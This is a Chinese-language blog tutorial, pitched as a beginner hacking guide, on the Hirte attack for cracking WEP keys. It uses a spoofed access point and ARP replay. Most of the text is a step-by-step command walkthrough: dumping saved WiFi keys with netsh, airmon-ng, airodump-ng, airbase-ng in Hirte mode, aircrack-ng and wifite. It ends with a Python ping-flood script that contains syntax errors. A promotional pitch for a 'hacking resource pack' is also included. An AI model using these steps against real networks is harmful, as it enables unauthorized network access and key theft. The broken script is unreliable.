渗透WEP新思路Hirte原理解析【黑客渗透测试零基础入门必看教程】

最新推荐文章于 2025-12-22 21:05:01 发布

原创最新推荐文章于 2025-12-22 21:05:01 发布 · 942 阅读

11 ·

CC 4.0 BY-SA版权

文章标签：

#网络 #web安全 #安全

前言

这是小强给粉丝盆友们整理的网络安全渗透测试入门阶段无线安全渗透与防御的基础教程。

喜欢的朋友们，记得给我点赞支持和收藏一下，关注我，学习黑客技术。

一.Hirte介绍

Hirte是破解无线网络WEP key的一种攻击类型

只要客户端设备（笔记本，手机等）连接过无线网络，哪些wifi即使是不再攻击者范围内也能被破解，因为该wifi的WEP密钥和配置文件仍然存储再这些无线设备中

netsh wlan show profile name="wifi_name" key=clear

在cmd中输入上列代码，即可查看已连接过WiFi的相关信息

实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点，当客户端设备尝试自动连接无线网络时，假冒接入点（攻击者机器）会对受害者设备进行ARP攻击，导致受害者设备将包含密钥流数据包发出

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

二.Hirte破解原理

1.安装一个假的WEP AP（wifi名，mac地址要相同）并等待客户端连接

假的AP将他的信标帧和真的AP放到同一个信道上，都叫做wifi_name,这时候客户端无法分清哪个是真的哪个是假的，就两个都发，

就像快递一样，把你家的门牌号涂改成邻居家的门牌号，快递小哥给邻居家送快递的时候就有可能送到你家

2.客户端的连接等待自动分配IP地址（可能会卡在这一步，因为kali自身的问题）

3.客户端发送一个ARP数据包

4.获得了ARP分组，并且将其转换成一个ARP请求为同一客户机

5.客户回复

6.收集这些数据包

7.破解WEP密钥

三.破解方式1

1.查看网卡信息

ip a

2.监听网卡

airmon-ng start wlan0

3.扫描附近的wifi

airodump-ng wlan0mon

4.配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK

airodump-ng wlan0mon --bssid ?? --write HSEK

5.开始伪造AP，用airbase-ng工具建立WEP接入点

airbase-ng -c 1 -a ? --essid "?" -W 1 -N wlan0mon

参数说明：

-c 信道

-a 模拟AP的mac地址

–essid：wifi的名称

-W：设置加密位

-N：使用Hirte攻击模式

wlan0mon：是接口

6.只要有客户端连上来，就会进行攻击

D8…是网卡

18：。。。。是客户端

模拟客户端和AP进行通讯

7.启动aircrack-ng从捕获的数据包中解密

aircrack-ng HSEK-01.cap

破解密码是有要求的，第一次ivs必须要大于5000（#Date那一栏），当小于这个数的话，就会提示数量不足

数量够多，且成功的话，有下图提示

可能出现的错误及解决方法：

1.出现连接不上，ping请求超时

解决：断开ARP攻击，让客户端连接起来或ping成功后在攻击

四.破解方式2（比1好用多了）

1.扫描并指定破解方式

wifite -wep -hirte

2.加速ivs收集

ping -t 192.168.1.1

3.开启攻击脚本

启动cmd.py

import os  
import threading  
import time  
  
class myThread (threading.Thread);  
    def __init__(self):  
        threading.Thread.__init__(self)  
    def run(self):  
        cmd="ping /t 192.168.1.1"  
        os.system(cmd)  
        time.sleep(0.1)  
  
threads=[]  
  
for i in range(50)  
    thread1 = myThread()  
    thread1.start()  
    threads.append(thread1)  
  
for item in threads:  
    item.join()  
print ("退出主线程")